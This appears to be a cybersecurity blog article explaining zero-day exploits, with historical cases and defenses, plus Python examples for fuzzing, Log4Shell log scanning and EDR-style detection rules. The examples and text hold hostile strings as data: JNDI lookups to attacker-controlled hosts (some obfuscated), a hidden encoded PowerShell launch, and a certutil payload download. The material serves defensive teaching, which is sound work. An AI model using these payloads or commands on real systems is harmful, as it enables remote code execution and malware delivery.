Cyber Threats · #zero-day #exploit #vulnerability

Zero-Day Exploits Explained: How They Work and Real Examples

Understand zero-day exploits—how vulnerabilities are discovered, why they're so dangerous, real-world examples, and how organizations defend against them.


A zero-day vulnerability is a software security flaw that is unknown to the vendor (or known but not yet fixed) and therefore has no patch. “Zero-day” refers to the number of days the vendor has had to fix it: zero. Code that takes advantage of such a flaw is a zero-day exploit, and using it against victims before a patch exists is a zero-day attack. These are among the most powerful tools in an attacker’s arsenal precisely because they work against fully patched, up-to-date systems.

What Makes Zero-Days Dangerous

The conventional defense against known vulnerabilities is to patch quickly after a CVE is published. Zero-days sidestep that defense entirely:

  1. No patch exists — there’s nothing to apply
  2. No signatures — AV and IDS tools have no signature for an exploit nobody has seen yet
  3. No known indicators — exploitation still leaves traces (crashes, odd process behavior, unexpected network connections), but nobody knows what to look for until the campaign is discovered
  4. High value — attackers who discover them keep them secret to maximize use before detection

A zero-day exploit chain — combining multiple zero-days to achieve full system compromise without triggering any alerts — can sell for millions of dollars on the exploit market.

How Zero-Days Are Discovered

Security Researchers (White Hats)

Legitimate security researchers discover zero-days through:

  • Fuzzing — automated testing with malformed or random inputs to trigger crashes, which may indicate exploitable memory-safety or logic bugs
  • Code review — manual analysis of source code, where it is available
  • Reverse engineering — disassembling or decompiling shipped binaries to recover and audit their logic when source is not available
  • Variant analysis — after a vulnerability is patched, researchers look for the same bug pattern elsewhere in the codebase (and in other projects that copied the code)
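The fuzzing bullet above is the one a practitioner can reproduce on a desk. The following is an added example, not code from the original page: a mutation-based fuzzer run against a deliberately buggy parser for a constructed record format (magic bytes, a one-byte count, then that many 32-bit integers). The parser trusts the count field, so a truncated or over-counted record makes struct.unpack raise, the Python analogue of an out-of-bounds read in a C parser. A hardened version with the missing bounds check is fuzzed alongside it. The format, the parser and the seed input are all invented for the example.

```python
import random
import struct


class ParseError(Exception):
    """The only exception a well-behaved parser may raise on bad input."""


def parse_record(buf: bytes) -> list:
    """Deliberately buggy parser for a constructed format:
    magic b"RC", one byte 'count', then 'count' big-endian uint32 values.
    The count is trusted without checking that enough bytes follow."""
    if len(buf) < 3 or buf[:2] != b"RC":
        raise ParseError("bad magic or truncated header")
    count = buf[2]
    # BUG (intentional): no length check. A short buffer makes struct.unpack
    # raise struct.error, which the fuzzer below treats as a crash.
    return list(struct.unpack(f">{count}I", buf[3:3 + 4 * count]))


def parse_record_fixed(buf: bytes) -> list:
    """Same format, with the bounds check the fuzzer should have forced."""
    if len(buf) < 3 or buf[:2] != b"RC":
        raise ParseError("bad magic or truncated header")
    count = buf[2]
    if len(buf) < 3 + 4 * count:
        raise ParseError(f"count={count} but only {len(buf) - 3} payload bytes")
    return list(struct.unpack(f">{count}I", buf[3:3 + 4 * count]))


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one to three random mutations: bit flip, byte overwrite with an
    'interesting' value, insertion, deletion, or truncation."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, 3)):
        op = rng.randrange(5)
        if op == 0 and buf:
            buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
        elif op == 1 and buf:
            buf[rng.randrange(len(buf))] = rng.choice([0x00, 0x7F, 0x80, 0xFF, rng.randrange(256)])
        elif op == 2:
            buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
        elif op == 3 and len(buf) > 1:
            del buf[rng.randrange(len(buf))]
        elif op == 4 and len(buf) > 1:
            del buf[rng.randrange(1, len(buf)):]
    return bytes(buf)


def fuzz(target, seeds, iterations: int = 2000, seed: int = 1):
    """Mutation-based fuzzer. Returns the first input that makes 'target'
    raise anything other than ParseError (an unexpected crash), or None."""
    rng = random.Random(seed)  # fixed seed so a run is reproducible
    corpus = list(seeds)
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        try:
            target(candidate)
        except ParseError:
            continue  # graceful rejection: not a bug
        except Exception as exc:  # anything else is a crash worth triaging
            return {"input": candidate, "exception": type(exc).__name__, "message": str(exc)}
        corpus.append(candidate)  # accepted input: keep it to explore deeper
    return None


SEEDS = [b"RC\x02" + struct.pack(">2I", 1, 2)]  # constructed valid record: count=2, values 1 and 2

if __name__ == "__main__":
    print("buggy parser:", fuzz(parse_record, SEEDS))
    print("fixed parser:", fuzz(parse_record_fixed, SEEDS))
```

The buggy parser falls over within a handful of iterations; the fixed one survives the full budget. Real fuzzers (AFL++, libFuzzer) add coverage feedback so that mutations which reach new code are kept, which is what lets them find bugs many branches deep rather than just in the first length check.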

Coordinated (or “responsible”) disclosure: most researchers report findings privately to the vendor, who fixes them within an agreed window (Google Project Zero’s policy is 90 days, plus a 30-day grace period for patch adoption before technical details are published). A CVE (Common Vulnerabilities and Exposures) identifier is usually reserved while the fix is in progress, and the public advisory is released once the patch ships.

Bug Bounty Programs

Companies including Google, Microsoft, Apple, and Meta pay out millions of dollars a year to researchers through bug bounty programs. Advertised top-tier rewards at the time of writing:

  • Google’s Chrome VRP: up to $250,000 for a sandbox escape
  • Apple Security Bounty: up to $2,000,000 for a top-tier iOS exploit chain (the Lockdown Mode bypass tier)
  • Pwn2Own: individual targets regularly pay $200,000 or more for a live zero-day demonstration

Nation-State Intelligence Agencies

Government agencies (NSA, GCHQ, FSB, MSS) maintain teams dedicated to discovering and stockpiling zero-days for offensive cyber operations. The NSA’s TAO (Tailored Access Operations) unit was shown by the 2013 Snowden leaks to hold a catalog of exploits and implants covering a wide range of platforms; EternalBlue (below) came from the same stockpile.

Underground Exploit Brokers

The commercial zero-day market exists in a legal gray area:

  • Zerodium has advertised up to $2.5M for an Android and $2M for an iOS full-chain, zero-click exploit with persistence
  • Vulnerability research firms (the now-defunct VUPEN and its successors) sell exploits to government clients
  • Dark web markets sell exploits to criminal organizations

A single critical iOS or Android zero-day can sell for $1M+ in this market.

Real-World Zero-Day Examples

Stuxnet (2010) — The First Cyber Weapon

Stuxnet targeted the centrifuges at Iran’s Natanz enrichment facility through their Siemens PLCs. It exploited four Windows zero-days at once, unprecedented at the time. The worm spread via USB drives, signed its rootkit drivers with certificates stolen from two Taiwanese hardware vendors (Realtek and JMicron), and specifically targeted the Siemens Step 7 software used to program the PLCs. It physically damaged centrifuges by driving them at improper speeds while replaying normal readings to the operators.

Widely attributed to the US and Israel’s Operation Olympic Games.

EternalBlue (2017) — NSA Tool Leaked

EternalBlue was an NSA exploit for a flaw in Windows’ SMBv1 implementation, which the agency had held as an undisclosed zero-day for years. Microsoft shipped a fix as MS17-010 on 14 March 2017; a month later, on 14 April 2017, the Shadow Brokers group published the tool along with other NSA exploits. Once public, it was weaponized within weeks:

  • WannaCry (12 May 2017) used EternalBlue to infect 230,000+ computers in 150 countries in a single day
  • NotPetya (27 June 2017) combined EternalBlue with credential theft (a Mimikatz-derived module) and legitimate admin tools (PsExec, WMIC) for lateral movement, devastating Maersk, Merck, FedEx, and dozens of other companies at an estimated $10 billion in damages

By the time of both outbreaks the fix had been available for two to three months, so strictly speaking the attacks exploited an n-day, not a zero-day; millions of systems were simply still unpatched. That gap between patch release and patch deployment is the window most real-world exploitation lives in.

SUNBURST / SolarWinds (2020) — Supply Chain Zero-Day

In one of the most sophisticated attacks on record, Russia’s foreign intelligence service (SVR, tracked as APT29/Cozy Bear) compromised SolarWinds’ build pipeline and inserted backdoor code into a signed Orion software update. There was no vulnerability in Orion to patch: the trusted update itself was the attack. It:

  • Was downloaded by up to ~18,000 customers; a far smaller, hand-picked subset received follow-on intrusion
  • Breached US Treasury, State Department, DHS, and dozens of Fortune 500 companies
  • Remained undetected for roughly nine months, from the first backdoored build in March 2020 until FireEye discovered it in December 2020

Log4Shell (CVE-2021-44228) — Zero-Day to Mass Exploitation in Hours

Log4Shell was a critical remote code execution vulnerability in Apache Log4j, a logging library embedded across much of the Java ecosystem. Log4j resolved ${...} lookups inside the messages it logged, and a JNDI lookup such as ${jndi:ldap://attacker.example/x} could make it fetch and load a class from an attacker-controlled server. Mass exploitation began within hours of public disclosure because:

  • Log4j is embedded in thousands of Java applications, often several dependency layers deep
  • The trigger was a single lookup string in any attacker-controlled value that got logged (a User-Agent header, a username, a chat message)
  • Public proof-of-concept code appeared within hours
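An added example of the hunting side of this, not code from the original page or from the Apache project: a scanner over constructed web-access-log lines that first statically resolves the nested ${lower:...}, ${upper:...}, ${date:...} and ${...:-default} lookups attackers used to hide the string “jndi” from naive pattern matching, then matches the canonical ${jndi:protocol form. The log lines, IP addresses and paths are invented; the hosts are documentation addresses.

```python
import re

# An innermost ${...} lookup: no nested braces or '$' inside the body.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Canonical form of the trigger, after obfuscation has been stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Statically evaluate the Log4j lookups used to hide 'jndi'.
    Anything we cannot evaluate is left in place unchanged."""
    if ":-" in inner:                       # ${anything:-default} -> default
        return inner.split(":-", 1)[1]
    head, sep, rest = inner.partition(":")
    if sep:
        key = head.strip().lower()
        if key == "lower":                  # ${lower:J} -> j
            return rest.lower()
        if key == "upper":                  # ${upper:j} -> J
            return rest.upper()
        if key == "date":                   # ${date:'j'} -> j
            return rest.strip("'\"")
    return "${" + inner + "}"               # unresolved: keep the marker


def normalize(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups repeatedly so that
    ${${lower:j}ndi:...} collapses to ${jndi:...}. Bounded to avoid pathological input."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            return text
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once obfuscation is removed."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed access-log lines (not real traffic); the payload sits in the User-Agent field.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jnd${::-i}:${::-r}mi://203.0.113.9:1099/x}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${java:version} report"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Lines 2 to 4 are flagged and line 5 (a non-JNDI lookup) is not. Matching raw strings for the literal “jndi”, as many early WAF rules did, misses lines 3 and 4; normalizing first is what closes that gap. The scanner only finds probes after the fact. The fix was upgrading Log4j to 2.17.1 or later, or removing the JndiLookup class from the jar where an upgrade was not possible.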

BlackLotus UEFI Bootkit (2023) — Secure Boot Zero-Day

BlackLotus was the first publicly documented UEFI bootkit capable of bypassing Secure Boot on fully patched Windows 11 systems (reported by ESET in March 2023). It exploited CVE-2022-21894 (Baton Drop), a Windows Boot Manager vulnerability Microsoft had fixed in January 2022. The fix alone did not help: the old, vulnerable boot manager binaries were still validly signed by Microsoft and had not been revoked in the UEFI forbidden-signature database (DBX), so the bootkit simply brought the old binary along with it. Strictly an n-day, it shows that a patch does not close a hole while the vulnerable code itself remains trusted.

How Organizations Defend Against Zero-Days

No defense is perfect against a quality zero-day, but layered security reduces the window of exploitation:

Patch management: While zero-days don’t have patches, many “zero-days” are actually n-days — vulnerabilities that have been patched but organizations haven’t applied the patch yet. Rapid patching is the baseline.

Attack Surface Reduction: Disable features you don’t use. If SMBv1 isn’t needed, disable it (as Microsoft recommends). Fewer enabled features = fewer potential zero-day surfaces.

Network Segmentation: Even if one system is compromised via a zero-day, segmentation limits lateral movement. Critical systems should not be reachable from general employee workstations.

Endpoint Detection and Response (EDR): Modern EDR tools like CrowdStrike Falcon, SentinelOne, and Microsoft Defender for Endpoint lean on behavioral analysis rather than signatures. They cannot recognize an unknown exploit itself, but what it does next usually looks wrong: shellcode executing from writable memory, an Office application or browser spawning a command shell, credentials being read out of LSASS. Those behaviors trigger alerts with no prior knowledge of the vulnerability. Two caveats: capable attackers test their tooling against the same products before using it, and behavioral rules need tuning so that legitimate admin activity does not drown analysts in benign matches.
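To make the “unexpected children” idea concrete, here is an added example, not code from the page or from any EDR vendor: a small rule set run over constructed process-creation events of the kind an EDR sensor collects. The parent/child rule flags document viewers and browsers launching script hosts, which is what a successful exploit in one of those processes almost always does next; two further rules catch encoded PowerShell and living-off-the-land downloads. Hostnames, timestamps, paths and command lines are invented.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class ProcessEvent:
    """One process-creation record of the kind an EDR sensor collects."""
    ts: str
    host: str
    parent_image: str
    image: str
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_unexpected_child(ev: ProcessEvent) -> Optional[str]:
    """Document viewers and browsers have no business launching script hosts."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return f"office application {parent} spawned {child}"
    if parent in BROWSERS and child in SCRIPT_HOSTS:
        return f"browser {parent} spawned {child}"
    return None


def rule_encoded_powershell(ev: ProcessEvent) -> Optional[str]:
    """Base64-encoded command lines are a staple of exploit payload stagers."""
    cl = ev.cmdline.lower()
    if _basename(ev.image) in {"powershell.exe", "pwsh.exe"} and (
            "-enc" in cl or "-encodedcommand" in cl or "frombase64string" in cl):
        return "powershell launched with an encoded command"
    return None


def rule_lolbin_download(ev: ProcessEvent) -> Optional[str]:
    """Living-off-the-land binaries pulling content from the network."""
    child, cl = _basename(ev.image), ev.cmdline.lower()
    if child == "certutil.exe" and "urlcache" in cl:
        return "certutil used to download a file"
    if child == "mshta.exe" and "http" in cl:
        return "mshta executing remote content"
    return None


RULES: List[Callable[[ProcessEvent], Optional[str]]] = [
    rule_unexpected_child, rule_encoded_powershell, rule_lolbin_download]


def detect(events: List[ProcessEvent]) -> List[dict]:
    """Run every rule over every event; one alert per (rule, event) match."""
    alerts = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append({"ts": ev.ts, "host": ev.host, "rule": rule.__name__, "reason": reason})
    return alerts


# Constructed sample telemetry (not real data). Event 2 is the classic malicious-document
# chain, events 5 and 6 are post-exploitation steps, the rest are benign.
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-01T09:00:01Z", "ws01", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    ProcessEvent("2024-05-01T09:00:07Z", "ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("2024-05-01T09:00:09Z", "ws01", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    ProcessEvent("2024-05-01T09:01:00Z", "ws02", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe --type=renderer"),
    ProcessEvent("2024-05-01T09:01:30Z", "ws02", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("2024-05-01T09:01:31Z", "ws02", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe", "certutil.exe -urlcache -split -f http://203.0.113.9/p.exe p.exe"),
    ProcessEvent("2024-05-01T09:05:00Z", "ws03", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-ChildItem C:\\"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['host']} {a['rule']}: {a['reason']}")
```

Nothing here knows which vulnerability was used; the Word-to-PowerShell chain fires whether the document exploited a zero-day or tricked the user into enabling a macro. The PowerShell launched from Explorer on ws03 is the tuning problem from the caveat above: it is benign here, and a rule that flagged every interactive PowerShell would be switched off within a week.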

Browser Isolation and Application Sandboxing: Run untrusted code (browser, email clients, office documents) inside strict sandboxes. A browser zero-day exploited inside a hardened container limits attacker impact.

Zero Trust Architecture: Verify every access request regardless of network location. Even a system fully compromised via a zero-day faces authentication requirements to access sensitive data on other systems.

The reality is that a sophisticated nation-state actor using quality zero-days against a targeted organization is extremely difficult to stop outright. The goal is to detect, contain, and respond as rapidly as possible.

#cybersecurity #CVE #vulnerability #exploit #zero-day